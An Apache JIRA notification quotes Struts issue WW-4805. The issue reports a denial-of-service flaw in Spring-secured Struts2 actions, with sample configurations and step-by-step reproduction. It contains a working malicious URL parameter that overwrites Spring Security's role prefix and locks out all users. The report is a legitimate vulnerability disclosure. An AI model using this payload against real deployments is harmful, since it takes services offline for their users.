[ https://issues.apache.org/jira/browse/WW-4805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16058896#comment-16058896 ]
ASF GitHub Bot commented on WW-4805: ------------------------------------ Github user lukaszlenart commented on the issue: https://github.com/apache/struts/pull/145 I'm not able to merge this PR as it also contains some changes from the `master` branch - I have no idea how does it happen, maybe some GitHub PR's magic :\ I will try to cherry-pick this. > At least a DoS attack is available for Spring secured actions > ------------------------------------------------------------- > > Key: WW-4805 > URL: https://issues.apache.org/jira/browse/WW-4805 > Project: Struts 2 > Issue Type: Improvement > Components: Core, Plugin - Spring > Affects Versions: 2.3.32, 2.5.10 > Reporter: Yasser Zamani > Labels: github-import, patch, security > Fix For: 2.3.33, 2.5.next > > > This is a DoS attack example when Struts2 user uses Spring to secure his > actions, like mentioned at section `Initializing Actions from Spring` of > [spring-plugin|https://struts.apache.org/docs/spring-plugin.html] > Attack Steps: > # An anonymous user logins as an authenticated user. > # Then tries > {noformat} > http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit > {noformat} > where {action0-actionN} are actions available for users > Attack Impacts: > By replacing `rolePrefix`, attacker blocks access to secured actions for all > defined roles even if they authenticate via login! so services are down and > webapp restart is required to back to normal!!! > Configuration Example: > * spring-security.xml > {code:xml} > <global-method-security secured-annotations="enabled" proxy-target-class > = "true" /> > <http auto-config="true" use-expressions="false"> > <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" /> > </http> > <authentication-manager erase-credentials="false"> > <authentication-provider> > <user-service> > <user name="admin" password="admin" authorities="ROLE_ADMIN" > /> > <user name="user" password="user" authorities="ROLE_USER" /> > </user-service> > </authentication-provider> > </authentication-manager> > {code} > * applicationContext.xml > {code:xml} > <bean id="secureAction" > class="me.zamani.yasser.ww_convention.actions.SecureAction"/> > {code} > * struts.xml > {code:xml} > <action name="admin" class="secureAction" method="admin"> > <result name="success" type="json" /> > </action> > <action name="user" class="secureAction" method="user"> > <result name="success" type="json" /> > </action> > {code} > * SecureAction.java > {code:java} > package me.zamani.yasser.ww_convention.actions; > import org.springframework.security.access.annotation.Secured; > public class SecureAction { > @Secured({"ROLE_ADMIN"}) > public String admin() { > return "success"; > } > @Secured({"ROLE_USER"}) > public String user() { > return "success"; > } > } > {code} > * login via > {noformat} > http://{ip}:{port}/login > {noformat} > as user. > * open > {noformat} > http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit > {noformat} > * in another browser, login via > {noformat} > http://{ip}:{port}/login > {noformat} > as admin. > * try to access > {noformat} > http://{ip}:{port}/admin > {noformat} > which fails! > * also repeat 5 and try open > {noformat} > http://{ip}:{port}/user > {noformat} > which also fails! > * Services are down and webapp restart is required to back to normal. -- This message was sent by Atlassian JIRA (v6.4.14#64029)